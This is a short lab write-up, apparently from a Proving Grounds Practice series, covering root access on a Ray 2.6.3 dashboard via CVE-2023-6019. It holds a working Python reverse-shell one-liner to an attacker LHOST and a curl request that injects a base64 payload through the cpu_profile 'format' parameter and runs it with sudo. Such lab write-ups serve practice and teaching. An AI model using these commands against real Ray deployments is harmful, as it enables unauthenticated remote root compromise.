Enumeration

Nmap

Initial nmap scan revealed SSH and non-common port 9000 were open.

00nmap

Web Enumeration

Website was Ray 2.6.3 website. I found the version from /#/cluster/info endpoint.

01ray version

Exploitation to Root

CVE-2023-6019

A command injection existed in Ray’s cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication. The issue is fixed in version 2.8.1+. Ray maintainers’ response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023

Version was vulnerable to command injection. After some research I found out I need to execute below commands to get RCE.

  1. Create a payload by replacing IP and PORT values with LHOST and LPORT values (base64) 
    echo "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"LHOST\", LPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" | base64 | tr -d '\n'
  2. replace payload, target ip and execute curl 
    curl 'http://192.168.157.37:9000/worker/cpu_profile?pid=3354&ip=<TARGET_IP>&duration=5&native=0&format=`echo%20<PAYLOAD>%20|base64$IFS-d|sudo%20sh`'

02exploit

Then obtained root shell.

03root

<
Previous Post
Slort - Proving Grounds Practice
>
Next Post
Nibbles - Proving Grounds Practice